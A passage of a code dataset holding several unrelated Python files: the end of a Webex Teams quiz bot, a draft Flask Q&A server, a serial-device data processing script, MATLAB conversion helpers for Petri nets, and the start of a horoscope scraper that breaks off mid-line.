api.messages.create(room.id, text=\"You can't send messages with attachments to me\",\n markdown=\"You can't send messages with attachments to me\")\n return 'OK'\n except TypeError:\n logger.debug(\"Not found attachment in user's input - OK\")\n\n if \"/test\" in message.text.lower():\n logger.info(\"FOUND '/test'\")\n return 'OK'\n\n\n #if \"/RERUN\" in message.text:\n # logger.info(f\"FOUND '\\/RERUN', deleting all the assigned tasks for the user: {message.personId}\")\n\n\n # return 'OK'\n\n elif \"/start\" in message.text.lower():\n logger.info(f'{message.personId}:FOUND \"/start\"')\n\n print(message.roomId)\n\n\n # check if that users exists\n if psql_obj.is_person_exists(message.personId):\n logger.info(f'{message.personId}:This is existing user')\n\n # check if that user already has task assigned\n has_task = Tasker.has_task(psql_obj,message.personId)\n\n logger.info(f'{message.personId}:That user has task? - {has_task}')\n\n if has_task:\n\n is_enough_flag = is_enough(psql_obj, message.personId)\n is_answered_flag = answer_received_for_current_task(psql_obj, message.personId)\n task_dict = {} # dictionary structure for the task\n task_dict = get_current_task(psql_obj, message.personId, has_task)\n\n if is_answered_flag and is_enough_flag:\n # If the user already completed all that tasks, we should not save answer from him\n\n logger.info(f'{message.personId}:User has already answered for all the questions. Letting him know about that')\n api.messages.create(room.id, text=message.text, markdown=\"You already answered all the tasks\")\n\n elif task_dict['files']:\n\n api.messages.create(room.id, text=\"You already have the task. Please answer it first\",\n markdown=\"You already have the task. Please answer it first\")\n\n # exception handling in case can't find attachment\n\n logger.info(f'{message.personId}:Picture path is not null,'\n f' trying to add picture as attachment:{task_dict[\"files\"]}')\n\n try:\n api.messages.create(room.id, text=\"Your current task:\",\n markdown=prepare_markdown_quiz_task(task_dict, task_dict['task_number']),\n files=task_dict['files'])\n except ValueError:\n logger.error(f'{message.personId}:Can\\'t open file to attach:{task_dict[\"files\"]}')\n\n api.messages.create(room.id,\n markdown=f'<>')\n api.messages.create(room.id, text=f\"The {task_dict['task_number']} question for you:\",\n markdown=prepare_markdown_quiz_task(task_dict,task_dict['task_number']))\n\n # If no attachment picture\n else:\n api.messages.create(room.id, text=\"You already have the task. Please answer it first\",\n markdown=\"You already have the task. Please answer it first\")\n\n logger.info(f'{message.personId}:Picture path is null, sending task without attachment')\n api.messages.create(room.id, text=f\"The {task_dict['task_number']} question for you:\",\n markdown=prepare_markdown_quiz_task(task_dict, task_dict['task_number']))\n\n else:\n\n logger.error(f'{message.personId}:We have that user'\n f' in persons table, but don\\'t have assigned tasks for him')\n logger.error(f'{message.personId}:Assigning task for him')\n\n #assign_new_task(api, psql_obj, room, message)\n\n task_dict = {} # dictionary structure for the task\n try:\n task_dict = assign_new_task(psql_obj, message.personId)\n except RuntimeError:\n #Error in addition to assigned_tasks table\n pass\n return 'NOK'\n except KeyError:\n #User have answered all the question that we have\n api.messages.create(room.id, text=\"You have answered all the question that we have\",\n markdown=\"You have answered all the question that we have\")\n return 'OK'\n\n if task_dict['files']:\n # exception handling in case can't find attachment\n\n logger.info(f'{message.personId}:Picture path is not null,'\n f' trying to add picture as attachment:{task_dict[\"files\"]}')\n\n try:\n api.messages.create(room.id, text=\"The {task_number} question for you:\",\n markdown=prepare_markdown_quiz_task(task_dict, task_dict['task_number']),\n files=task_dict['files'])\n except ValueError:\n logger.error(f'{message.personId}:Can\\'t open file '\n f'to attach:{task_dict[\"files\"]}')\n\n api.messages.create(room.id,\n markdown=f'<>')\n api.messages.create(room.id, text=f\"The {task_dict['task_number']} question for you:\",\n markdown=prepare_markdown_quiz_task(task_dict,task_dict['task_number']))\n\n # If no attachment picture\n else:\n logger.info(f'{message.personId}:Picture path is null, sending task without attachment')\n api.messages.create(room.id, text=f\"The {task_dict['task_number']} question for you:\",\n markdown=prepare_markdown_quiz_task(task_dict, task_dict['task_number']))\n\n\n # user does not exist, create it and assign the task\n else:\n logger.info(f'{message.personId}:This is new user')\n api.messages.create(room.id, text=\"You are new user\", markdown=\"You are **new** user\")\n\n #Creating new user\n person_name = api.people.get(message.personId).firstName\n person_surname = api.people.get(message.personId).lastName\n\n if psql_obj.add_person(message.personId,person_name,person_surname,message.personEmail):\n logger.info(f'{message.personId}:User {message.personId} created user successfully')\n #assign_new_task(api, psql_obj, room, message)\n\n\n task_dict = {} # dictionary structure for the task\n try:\n task_dict = assign_new_task(psql_obj, message.personId)\n except RuntimeError:\n #Error in addition to assigned_tasks table\n pass\n return 'NOK'\n except KeyError:\n #User have answered all the question that we have\n api.messages.create(room.id, text=\"You have answered all the question that we have\",\n markdown=\"You have answered all the question that we have\")\n return 'OK'\n\n if task_dict['files']:\n # exception handling in case can't find attachment\n\n logger.info(f'{message.personId}:Picture path is not null,'\n f' trying to add picture as attachment:{task_dict[\"files\"]}')\n\n try:\n api.messages.create(room.id, text=\"The {task_number} question for you:\",\n markdown=prepare_markdown_quiz_task(task_dict, task_dict['task_number']),\n files=task_dict['files'])\n except ValueError:\n logger.error(f'{message.personId}:Can\\'t open file to attach:{task_dict[\"files\"]}')\n\n api.messages.create(room.id,\n markdown=f'<>')\n api.messages.create(room.id, text=f\"The {task_dict['task_number']} question for you:\",\n markdown=prepare_markdown_quiz_task(task_dict,task_dict['task_number']))\n\n # If no attachment picture\n else:\n logger.info(f'{message.personId}:Picture path is null, sending task without attachment')\n api.messages.create(room.id, text=f\"The {task_dict['task_number']} question for you:\",\n markdown=prepare_markdown_quiz_task(task_dict, task_dict['task_number']))\n\n else:\n logger.error(f'{message.personId}:User {message.personId} creation failed')\n\n\n return 'OK'\n\n\n elif message.text in \"123456789\":\n logger.info(f'{message.personId}:FOUND \"[digit]\" in message:{message.text}')\n\n # If answer in range of the expected answers\n check_answer = check_answer_in_range(psql_obj, message.personId, int(message.text))\n\n is_enough_flag = is_enough(psql_obj, message.personId)\n is_answered_flag = answer_received_for_current_task(psql_obj, message.personId)\n\n if is_answered_flag and is_enough_flag:\n # If the user already completed all that tasks, we should not save answer from him\n\n logger.info(f'{message.personId}:User has already answered for'\n f' all the questions. Letting him know about that')\n api.messages.create(room.id, text=message.text, markdown=\"You already answered all the tasks\")\n\n\n # If user's answer is in expected range\n elif check_answer == 0:\n save_user_answer(psql_obj, message)\n\n api.messages.create(room.id, text=message.text, markdown=\"Thank you, your answer was accepted\")\n\n # Check that user has answered all questions and we need to prepare report for him\n if is_enough_flag:\n report_dict = {}\n\n api.messages.create(room.id, text=message.text, markdown=\"You have completed the interview. \"\n \"Preparing score for you\")\n report_dict = generate_report_dict(psql_obj, message.personId)\n\n api.messages.create(room.id, text=message.text, markdown=\"**Answered correctly:**\")\n\n for correct_answer in report_dict['correct']:\n task = Tasker.get_assigned_task_by_id(psql_obj, message.personId, correct_answer[\"task_id\"])\n\n api.messages.create(room.id, text=message.text, markdown=f'- {task[\"task\"][0:20]}<...>')\n\n\n api.messages.create(room.id, text=message.text,\n markdown=\"**Answered incorrectly [your_answer -> right answer]:**\")\n\n for wrong_answer in report_dict['wrong']:\n task = Tasker.get_assigned_task_by_id(psql_obj, message.personId, wrong_answer[\"task_id\"])\n text = f'- {task[\"task\"][0:20]}<...> [{wrong_answer[\"user_answer\"]}->{wrong_answer[\"loc_answer\"]}]'\n\n #api.messages.create(room.id, text=message.text, markdown=f'{task[\"task\"][0:20]}...')\n api.messages.create(room.id, text=message.text, markdown=text)\n\n else:\n task_dict = {} # dictionary structure for the task\n try:\n task_dict = assign_new_task(psql_obj, message.personId)\n except RuntimeError:\n #Error in addition to assigned_tasks table\n pass\n return 'NOK'\n except KeyError:\n #User have answered all the question that we have\n api.messages.create(room.id, text=\"You have answered all the question that we have\",\n markdown=\"You have answered all the question that we have\")\n return 'OK'\n\n if task_dict['files']:\n # exception handling in case can't find attachment\n\n logger.info(f'{message.personId}:Picture path is not null, '\n f'trying to add picture as attachment:{task_dict[\"files\"]}')\n\n try:\n api.messages.create(room.id, text=\"The {task_number} question for you:\",\n markdown=prepare_markdown_quiz_task(task_dict, task_dict['task_number']),\n files=task_dict['files'])\n except ValueError:\n logger.error(f'{message.personId}:Can\\'t open file to attach:{task_dict[\"files\"]}')\n\n api.messages.create(room.id,\n markdown=f'<>')\n api.messages.create(room.id, text=f\"The {task_dict['task_number']} question for you:\",\n markdown=prepare_markdown_quiz_task(task_dict,task_dict['task_number']))\n\n # If no attachment picture\n else:\n logger.info(f'{message.personId}:Picture path is null, sending task without attachment')\n api.messages.create(room.id, text=f\"The {task_dict['task_number']} question for you:\",\n markdown=prepare_markdown_quiz_task(task_dict, task_dict['task_number']))\n\n # If user doesn't have tasks assigned\n elif check_answer == -1:\n logger.info(f'{message.personId}:User does not have tasks assigned')\n api.messages.create(room.id, text=message.text, markdown=\n f'You don\\t have tasks assigned, send me /START first')\n\n # If user's answer is not in range of the expected answers\n else:\n logger.info(f'{message.personId}:User\\'s answer is not in range of '\n f'the expected answers (1 to {check_answer})')\n api.messages.create(room.id, text=message.text, markdown=f'You should answer 1 to {check_answer}')\n\n return 'OK'\n\n elif \"/repeat\" in message.text.lower():\n logger.info(f'{message.personId}:FOUND \"/repeat\"')\n\n\n\n # check if that users exists\n if psql_obj.is_person_exists(message.personId):\n logger.info(f'{message.personId}:This is existing user')\n\n\n\n\n # check if that user already has task assigned\n has_task = Tasker.has_task(psql_obj,message.personId)\n\n logger.info(f'{message.personId}:That user has task? - {has_task}')\n\n if has_task:\n\n is_enough_flag = is_enough(psql_obj, message.personId)\n is_answered_flag = answer_received_for_current_task(psql_obj, message.personId)\n task_dict = {} # dictionary structure for the task\n task_dict = get_current_task(psql_obj, message.personId, has_task)\n\n if is_answered_flag and is_enough_flag:\n # If the user already completed all that tasks, we should not save answer from him\n\n logger.info(f'{message.personId}:User has already answered for all the questions.'\n f' Letting him know about that')\n api.messages.create(room.id, text=message.text, markdown=\"You already answered all the tasks\")\n\n elif task_dict['files']:\n # exception handling in case can't find attachment\n\n logger.info(f'{message.personId}:Picture path is not null, '\n f'trying to add picture as attachment:{task_dict[\"files\"]}')\n\n try:\n api.messages.create(room.id, text=\"Your current task:\",\n markdown=prepare_markdown_quiz_task(task_dict, task_dict['task_number']),\n files=task_dict['files'])\n except ValueError:\n logger.error(f'{message.personId}:Can\\'t open file to attach:{task_dict[\"files\"]}')\n\n api.messages.create(room.id,\n markdown=f'<>')\n api.messages.create(room.id, text=f\"The {task_dict['task_number']} question for you:\",\n markdown=prepare_markdown_quiz_task(task_dict,task_dict['task_number']))\n\n # If no attachment picture\n else:\n logger.info(f'{message.personId}:Picture path is null, sending task without attachment')\n api.messages.create(room.id, text=f\"The {task_dict['task_number']} question for you:\",\n markdown=prepare_markdown_quiz_task(task_dict, task_dict['task_number']))\n\n else:\n\n logger.error(f'{message.personId}:We have that user in persons table, but don\\'t have tasks assigned. '\n 'Notify him about that')\n\n api.messages.create(room.id, text=\"You don't have tasks assigned\",\n markdown=\"You don't have tasks assigned\")\n\n # user does not exist, create it and assign the task\n else:\n logger.info(f'{message.personId}:This is new user, no tasks assigned. Notify him about that')\n api.messages.create(room.id, text=\"You don't have tasks assigned\", markdown=\"You don't have tasks assigned\")\n\n return 'OK'\n\n elif \"/help\" in message.text.lower():\n logger.info(f'{message.personId}:FOUND \"/help\"')\n\n help_str = \"**Commands supported:**\\n\" \\\n \" * /start - start quiz's process\\n\" \\\n \" * /repeat - repeat current question\\n\" \\\n \" * [1-9] - send digit to chose an answer for the question\\n\"\n\n api.messages.create(room.id, text=help_str, markdown=help_str)\n\n return 'OK'\n\n else:\n logger.error(f'{message.personId}:Not valid option {message.text}, you can send only: /START or [digits]')\n\n api.messages.create(room.id, text=\"Not valid option, you can send only: /START or [digits]\",\n markdown=\"Not valid option, you can send only: /START or [digits]\")\n return 'OK'\n\ndef get_current_task(psql_obj,person_id, task_id: int) -> dict:\n\n dict_result = {\n 'task':'',\n 'task_id':'',\n 'task_number':'',\n 'files' : [],\n 'variants' : []\n }\n\n\n all_user_tasks = Tasker.get_assigned_tasks_by_person(psql_obj, person_id)\n logger.info(f'{person_id}:All user tasks:{all_user_tasks}')\n\n task_number = len(all_user_tasks)\n\n task = Tasker.get_assigned_task_by_id(psql_obj, person_id, task_id)\n #dict_result = task\n\n dict_result['task'] = task['task']\n dict_result['task_id'] = task['id']\n dict_result['task_number'] = task_number\n dict_result['variants'] = task['variants']\n\n\n # Check whether we need to add attachment in message\n if task[\"picture_path\"]:\n # exception handling in case can't find attachment\n full_pict_path = os.path.join(config[\"pictures_folder\"], task[\"picture_path\"])\n logger.info(f'{person_id}:Picture path is not null,'\n f' trying to add picture as attachment:{full_pict_path}')\n\n dict_result['files'] = [full_pict_path]\n # If no attachment picture\n else:\n logger.info(f'{person_id}:Picture path is null, sending task without attachment')\n\n\n return dict_result\n\n\n\ndef assign_new_task(psql_obj,person_id) -> dict:\n\n dict_result = {\n 'task':'',\n 'task_id':'',\n 'task_number':'',\n 'files' : [],\n 'variants' : []\n }\n\n\n # incrementing task id in message to the customer\n\n all_user_tasks = Tasker.get_assigned_tasks_by_person(psql_obj, person_id)\n logger.info(f'{person_id}:All user tasks:{all_user_tasks}')\n\n task_number = len(all_user_tasks) + 1\n\n task = Tasker.get_random_task(psql_obj,person_id)\n\n if task:\n #dict_result['task'] = task['task']\n #dict_result['task_id'] = task['id']\n #dict_result['task_number'] = task_number\n #dict_result['variants'] = task['variants']\n\n # Check whether we need to add attachment in message\n #if task[\"picture_path\"]:\n # # exception handling in case can't find attachment\n # full_pict_path = os.path.join(config[\"pictures_folder\"], task[\"picture_path\"])\n # logger.info(f'Picture path is not null, trying to add picture as attachment:{full_pict_path}')\n\n # dict_result['files'] = [full_pict_path]\n # If no attachment picture\n #else:\n # logger.info('Picture path is null, sending task without attachment')\n\n ##return dict_result\n\n \"\"\"\n # Check whether we need to add attachment in message\n if task[\"picture_path\"]:\n # exception handling in case can't find attachment\n full_pict_path = os.path.join(config[\"pictures_folder\"],task[\"picture_path\"])\n logger.info(f'Picture path is not null, trying to add picture as attachment:{full_pict_path}')\n\n try:\n api.messages.create(room.id, text=f\"The {task_number} question for you:\",\n markdown=prepare_markdown_quiz_task(task,task_number),files=\n [f'{full_pict_path}'])\n except ValueError:\n logger.error(f'Can\\'t open file to attach:{task[\"picture_path\"]}')\n\n api.messages.create(room.id,markdown=f'<>')\n api.messages.create(room.id, text=f\"The {task_number} question for you:\",\n markdown=prepare_markdown_quiz_task(task, task_number))\n\n # If no attachment picture\n else:\n logger.info('Picture path is null, sending task without attachment')\n api.messages.create(room.id, text=f\"The {task_number} question for you:\",\n markdown=prepare_markdown_quiz_task(task,task_number))\n \"\"\"\n\n\n # TODO: we are not randomizing tasks' answer list now\n if Tasker.assign_task(psql_obj,person_id, task[\"id\"], task[\"answer\"]):\n logger.info(f'{person_id}:Added task to the assigned_tasks table successfully')\n else:\n logger.info(f'{person_id}:Error in addition to assigned_tasks table')\n #return False\n # raise erorr if we could not add task to PSQL table, to catch this error at the upper level\n raise RuntimeError\n\n else:\n logger.info(f'{person_id}:User have answered all the question that we have')\n raise KeyError\n #api.messages.create(room.id, text=\"You have answered all the question that we have\",\n # markdown=\"You have answered all the question that we have\")\n\n return get_current_task(psql_obj,person_id,task[\"id\"])\n #.assign_task(psql_obj,person_id, task[\"id\"], task[\"answer\"])\n\ndef save_user_answer(psql_obj,message) -> bool:\n\n # check if that user already has task assigned\n has_task = Tasker.has_task(psql_obj, message.personId)\n logger.debug(f'{message.personId}:Found current task id:{has_task}')\n\n task = Tasker.get_assigned_task_by_id(psql_obj, message.personId, has_task)\n\n if Tasker.save_user_answer(psql_obj, message.personId, task[\"id\"], message.text):\n logger.info(f'{message.personId}:Successfully saved user answer')\n return True\n else:\n logger.info(f'{message.personId}:Error saving user answer')\n return False\n\ndef is_enough(psql_obj,person_id) -> bool:\n # Check whether we need to assign next question to the user\n\n all_user_tasks = Tasker.get_assigned_tasks_by_person(psql_obj, person_id)\n logger.info(f'{person_id}:All user tasks:{all_user_tasks}')\n\n if len(all_user_tasks) >= config['tasks_num']:\n return True\n else:\n return False\n\ndef generate_report_dict(psql_obj,person_id) -> Dict:\n # Generate report for the user\n\n # creating dict for report\n dict_report = {'correct':[],'wrong':[]}\n\n all_user_tasks = Tasker.get_assigned_tasks_by_person(psql_obj, person_id)\n logger.info(f'{person_id}:All user tasks:{all_user_tasks}')\n\n dict_report['correct'] = Tasker.get_correct_answers(psql_obj, person_id)\n dict_report['wrong'] = Tasker.get_wrong_answers(psql_obj, person_id)\n\n print(dict_report)\n\n return dict_report\n\ndef check_answer_in_range(psql_obj,person_id,answer_num:int) -> int:\n\n all_user_tasks = Tasker.get_assigned_tasks_by_person(psql_obj, person_id)\n\n if len(all_user_tasks) > 0:\n\n # Get task id for the latest task\n\n task_id = all_user_tasks[0][\"task_id\"]\n logger.info(f'{person_id}:Latest task_id for the user {person_id}:{task_id}')\n\n\n task = Tasker.get_assigned_task_by_id(psql_obj, person_id, task_id)\n\n if answer_num in range(1,len(task[\"variants\"])+1):\n return 0\n else:\n return len(task[\"variants\"])\n\n else:\n # No assigned tasks found\n return -1\n\ndef answer_received_for_current_task(psql_obj,person_id) -> bool:\n # Check that we have received answer for the assigned task\n\n all_user_tasks = Tasker.get_assigned_tasks_by_person(psql_obj, person_id)\n\n\n if len(all_user_tasks) > 0:\n # Get task id for the latest task\n\n if all_user_tasks[0][\"user_answer\"] == None:\n return False\n\n else:\n return True\n\n else:\n return False\n\n\ndef prepare_markdown_quiz_task(task: Dict, task_number:int) -> str:\n\n result_str = f'The #{task_number} question for you:
{task[\"task\"]}
'\n\n i = 1 # options' counter\n\n for option in task[\"variants\"]:\n result_str += f'{i}. {option}
'\n i += 1\n\n result_str += f'Choose your answer (1 to {i-1}):'\n\n return result_str\n\n\n\n\n# Core bot functionality\n# Your Webex Teams webhook should point to http://:5000/events\n#@flask_app.route('/events', methods=['GET', 'POST'])\n@flask_app.route('/messages', methods=['GET', 'POST'])\ndef webex_teams_webhook_messages():\n logger.info(f'{message.personId}:TEST')\n return True\n\n@flask_app.route('/', methods=['GET', 'POST'])\ndef webex_teams_webhook_events():\n \"\"\"Processes incoming requests to the '/' URI.\"\"\"\n\n if request.method == 'POST':\n \"\"\"Respond to inbound webhook JSON HTTP POST from Webex Teams.\"\"\"\n\n\n webhook_obj = create_webhook_obj(request.json)\n # Get the room details\n room = api.rooms.get(webhook_obj.data.roomId)\n # Get the message details\n message = api.messages.get(webhook_obj.data.id)\n #webhook_obj.data.roomId = 'group' # 'direct'\n # Get the sender's details\n person = api.people.get(message.personId)\n\n logger.info(\"NEW MESSAGE IN ROOM '{}'\".format(room.title))\n logger.info(\"FROM '{}'\".format(person.displayName))\n logger.info(\"MESSAGE '{}'\".format(message.text))\n\n # This is a VERY IMPORTANT loop prevention control step.\n # If you respond to all messages... You will respond to the messages\n # that the bot posts and thereby create a loop condition.\n me = api.people.me()\n if message.personId == me.id:\n # Message was sent by me (bot); do not respond.\n return 'OK'\n\n else:\n # Message was sent by someone else; parse message and respond.\n return process_message(api,message,room)\n\n\n\n\nif __name__ == '__main__':\n\n \"\"\"\n try:\n psql_obj = PSQL.PSQL('ciscolive', config[\"db_host\"],\n config[\"db_login\"], config[\"db_password\"])\n except IndexError:\n logger.fatal(f'Can\\'t connect to Database:{config[\"db_login\"]}@{config[\"db_host\"]}/ciscolive')\n exit(2)\n\n logger.info(f'Connected to DB:{config[\"db_login\"]}@{config[\"db_host\"]}/ciscolive')\n\n rows = psql_obj.get_assigned_tasks()\n\n logger.info(rows)\n \"\"\"\n\n\n # Start the Flask web server\n flask_app.run(host='0.0.0.0', port=10010)","sub_path":"test2_bot.py","file_name":"test2_bot.py","file_ext":"py","file_size_in_byte":32801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"15289982","text":"from flask import Flask, request, render_template\nimport persistence\nimport logic\n\napp=Flask(__name__)\n\n@app.route(\"/\")\n@app.route('/list', methods=[\"POST\", \"GET\"])\ndef index():\n # item = logic.find_by_id(id)\n list_of_headers=persistence.import_headers_from_file(\"sample_data/question.csv\")\n list_of_dictionaries = persistence.import_data_from_file(\"sample_data/question.csv\")\n # return render_template(\"list_of_question.html\", list_of_dictionaries=list_of_dictionaries, list_of_headers=list_of_headers, item = item)\n\n@app.route(\"/addanswer\", methods=[\"POST\"])\ndef addanswer():\n return render_template(\"addanswer.html\")\n\n@app.route(\"/addquestion\", methods=['POST','GET'])\ndef addquestion():\n if request.method == \"POST\":\n return render_template('addquestion.html')\n elif request.method == \"GET\":\n return redirect('/')\n\n# @app.route(\"/question/\")\n# def question(id):\n# return render_template(\"question.\")\n\n@app.route(\"/question//delete\", methods=['GET', 'POST'])\ndef delete_question(question_id):\n logic.delete_by_id(\"q\", question_id)\n return redirect('/')\n\n@app.route(\"/answer//delete\", methods=['GET', 'POST'])\ndef delete_answer(answer_id):\n logic.delete_by_id(\"a\", question_id)\n return redirect('/')\n\n\nif __name__ == \"__main__\":\n app.run(debug=True,\n port = 5001)","sub_path":".history/server_20180531182013.py","file_name":"server_20180531182013.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"339340585","text":"#! /usr/bin/env python\n\"\"\"!\n\n\"\"\"\n__author__ = \"Ben Johnston\"\n__revision__ = \"0.1\"\n__date__ = \"\"\n__license__ = \"GPL v2.0\"\n\n##IMPORTS#####################################################################\nimport pickle\nimport sys\nimport pdb\n##############################################################################\nacknowledge = 'OK\\n'\n\n\ndef pair_device(device, logger):\n acknowledge = 'OK\\n'\n #The first message to be received is \"Pairing\"\n while 1:\n response = device.readline()\n logger.info('From device @%s: %s' % (device.port, response))\n if response.find('Pairing\\r\\n') >= 0:\n break\n\n #Wait for receipt of paired message\n while 1:\n device.write(acknowledge)\n logger.info('To device @%s: %s' % (device.port, acknowledge))\n response = device.readline()\n logger.info('From device @%s: %s' % (device.port, response))\n if response.find('Paired\\r\\n') >= 0:\n break\n\n\ndef handle_tasks(device, logger, debug_level):\n task_list = {'1': 'new_test',\n '2': 'retrieve_test',\n '3': 'restart'}\n tasks = ''\n response = '\\r'\n while response != '':\n response = device.readline()\n tasks += response\n logger.info('From device @%s: %s' % (device.port, response))\n print (tasks.strip())\n\n #Get user selection\n selection = ''\n while not (selection in task_list.keys()):\n selection = raw_input('Selection: ')\n device.write(task_list[selection] + '\\n')\n\n return int(selection)\n\n\ndef wait_for_test(device, logger, debug_level):\n if debug_level == 0:\n sys.stdout.flush()\n sys.stdout.write('\\rCollecting data')\n\n #Wait for data to be ready for receipt\n while 1:\n ##Update counter waiting for data\n if debug_level == 0:\n sys.stdout.flush()\n sys.stdout.write('.')\n\n response = device.readline()\n logger.info('From device @%s: %s' % (device.port, response))\n if response.find('Error') >= 0:\n return -1\n elif response.find('Done') >= 0:\n return 0\n elif response.find('collected') >= 0:\n print('Data Collected')\n return 1\n\n\ndef retrieve_data(device, logger, debug_level):\n #Get the test data to retrieve\n response = device.readline()\n if debug_level > 0:\n logger.info('From device @%s: %s' % (device.port, response))\n else:\n if response != '':\n print(response)\n #Get the upper limit of available tests\n upper_lim = int(response[0:response.find('test(s) available to read')])\n test_selection = -1\n #Get the input from the user\n while 1:\n try:\n test_selection = int(raw_input('Test Selection: '))\n logger.info('From device @%s: %s' % (device.port, response))\n if (test_selection < 0) or (test_selection > upper_lim):\n print(\"Enter a number greater than or equal to 0\")\n elif (test_selection >= 0) and (test_selection <= upper_lim):\n device.write(str(test_selection) + '\\n')\n return None\n except ValueError:\n print(\"Please enter a number greater than 0\")\n\n #Send the test selection\n device.write(str(test_selection) + '\\n')\n response = device.readline()\n while response.find('Ready for data?') < 0:\n response = device.readline()\n logger.info('From device @%s: %s' % (device.port, response))\n device.write(acknowledge)\n #Wait to get the number of blocks to read\n while response.find('Blocks to read') < 0:\n response = device.readline()\n logger.info('From device @%s: %s' % (device.port, response))\n\n #Get the total of number of blocks for the system\n block_counter = int(response.split(',')[1])\n #Create a blank string to store all data\n data = ''\n\n for i in range(block_counter):\n sys.stdout.flush()\n sys.stdout.write('\\rRetrieving data block %d/%d' %\n (i + 1, block_counter))\n #Get the first block\n response = device.readline()\n logger.info('From device @%s: %s' % (device.port, response))\n if response.find('Error') >= 0:\n sys.exit(0)\n elif response.find('Done') >= 0:\n break\n elif response.find('Data for block') >= 0:\n response = device.readline()\n logger.info('From device @%s: %s' % (device.port, response))\n data += response.strip('\\r\\n').strip(' ')\n return data\n\n\ndef process_sd_data(data=None, channels=[1, 2, 3]):\n if data is None:\n return None\n #Create a copy of the data\n data_copy = data.strip('\\r\\n').split(',')\n #Generate blank dictionary for channels\n processed_data = {}\n for channel in channels:\n processed_data[channel] = []\n\n i = 0\n while i < (len(data_copy) - 1):\n processed_data[int(data_copy[i])].append(int(data_copy[i + 1]))\n i += (len(channels) - 1)\n\n #Return the dictionary of data\n return processed_data\n\n\ndef write_sd_to_file(processed_data=None, file_name='sd_data.csv'):\n if processed_data is None:\n return None\n\n number_of_data_points = []\n for channel in processed_data.keys():\n number_of_data_points.append(len(processed_data[channel]))\n number_of_data_points = min(number_of_data_points)\n with open(file_name, 'w') as f:\n for channel in processed_data.keys():\n f.write('%d,' % channel)\n f.write('\\n')\n for row in range(number_of_data_points):\n for channel in processed_data.keys():\n f.write('%d,' % processed_data[channel][row])\n f.write('\\n')\n\ndata = pickle.load(open('data.pk', 'r'))\n\nprocessed_data = process_sd_data(data)\nwrite_sd_to_file(processed_data)\n","sub_path":"process_sd_data.py","file_name":"process_sd_data.py","file_ext":"py","file_size_in_byte":5809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"17287834","text":"\"\"\"\nauthor: Xu Wang\nemail: i@xuwang.im\n\nPublished under GPL 2.0\n\nA collection of tools to connect Python and Matlab.\n\"\"\"\n\nimport numpy as np\n\ndef is_integer(i):\n if type(i) is int or type(i) is np.int64:\n return True\n else:\n return False\n\ndef matrix_to_matlab_string(v):\n \"\"\"\n convert a python matrix or vector to a matlab 'm' file string\n \"\"\"\n if is_integer(v[0]):\n # v is a vector, not a matrix\n t = ['[']\n for vi in v:\n t.append('%s ' % vi)\n t.append(']')\n return ''.join(t)\n else:\n t = ['[']\n for i in range(0, len(v)):\n vi = v[i]\n ti = ['[']\n for j in vi:\n ti.append('%s ' % j)\n ti.append(']')\n if i < len(v) - 1:\n ti.append(';\\n')\n t.append(''.join(ti))\n t.append(']')\n return ''.join(t)\n\ndef create_petri_net_matlab_file(file_name, pn, marking=None):\n \"\"\"\n write matlab style Petri net matrices to file_name\n :param file_name: a string, the filename\n :param pn: a PetriNet\n :param marking: a Marking\n :return: None\n \"\"\"\n fid = open(file_name, 'w')\n fid.write(pn.to_matlab_string(marking))\n\ndef max_key_in_dict(d):\n \"\"\"\n Find the max key in d\n :param d: is a dict whose keys are integers\n :return: the max key\n \"\"\"\n return max(d.keys())\n\ndef time_interval_to_matlab_string(theta):\n \"\"\"\n Convert time intervals in TPN to matlab\n :param theta: a dict theta[ti] = [a, b], ti belongs to integers\n :return: string..\n \"\"\"\n string = ['I = [']\n for i in range(0, max_key_in_dict(theta)+1):\n if i in theta:\n string.append(str(theta[i]).replace(',', ';'))\n else:\n string.append('[0; inf]')\n if i < max_key_in_dict(theta):\n string.append(',')\n string.append('];')\n return ''.join(string)\n\ndef matlab_style_index(v):\n \"\"\"\n convert the list of indices v to matlab style: for each i in v, i += 1\n :param v: a list of indices in Python style (starting from 0)\n :return: a list of indeces in matlab styyle (starting from 1)\n \"\"\"\n m_v = list(v)\n for i in range(0, len(m_v)):\n m_v[i] += 1\n return m_v","sub_path":"matlab.py","file_name":"matlab.py","file_ext":"py","file_size_in_byte":2250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"249223202","text":"#!/usr/bin/env python3\n#Author:Anshuman Mukherjee\n'''\nPulls the horoscopes from following sources\nganeshaspeaks.com\nastrology.com\nhoroscope.com\n\nusage: horoscope.py [-h] [-s SIGN] [-d DAY]\n\nDisplay the daily horoscope based on time and sign\n\noptional arguments:\n -h, --help show this help message and exit\n -s SIGN, --sign SIGN enter the full sun sign\n -d DAY, --day DAY enter yesterday,today or tommorrow\n\nScript created for fun and learning, should be used by one's own discretion\n'''\n\nimport urllib.request, urllib.error, urllib.parse\nimport re, argparse,datetime\nfrom bs4 import BeautifulSoup as soup\nfrom datetime import datetime, timedelta\n\ndef Download_Page(url, user_agent='fatso', num_retries=2):\n\t#print \turl\n\theaders = {'User-agent':user_agent}\n\trequest = urllib.request.Request(url, headers=headers)\n\ttry:\n\t\thtml = urllib.request.urlopen(request).read()\n\n\texcept urllib.error.URLError as e:\n\t\thtml = None\n\t\tif num_retries > 0:\n\t\t\tif hasattr(e,'code') and 500 <= e.code < 600:\n\t\t\t\treturn download(url, user_agent, num_retries - 1)\n\treturn html\n\ndef from_Horoscope_com(time = \"today\", sign = \"aquarius\"):\n\t'''Pull horoscope from horoscope.com'''\n\tsign_dict = {\"aries\":\"1\",\"taurus\":\"2\",\"gemini\":\"3\",\"cancer\":\"4\",\n\t\"leo\":\"5\",\"virgo\":\"6\",\"libra\":\"7\",\"scorpio\":\"8\",\n\t\"sagittarius\":\"9\",\"capricorn\":\"10\",\"aquarius\":\"11\",\"pisces\":\"12\"}\n\n\tbase_url = \"https://www.horoscope.com/us/horoscopes/general/\"\n\tif time == 'today':\n\t\tfetch_url = base_url + \"horoscope-general-daily-today.aspx?sign=\"+ sign_dict[sign]\n\telif time == 'yesterday':\n\t\tfetch_url = base_url + \"horoscope-general-daily-yesterday.aspx?sign=\"+ sign_dict[sign]\n\telse:\n\t\tfetch_url = base_url + \"horoscope-general-daily-tomorrow.aspx?sign=\"+ 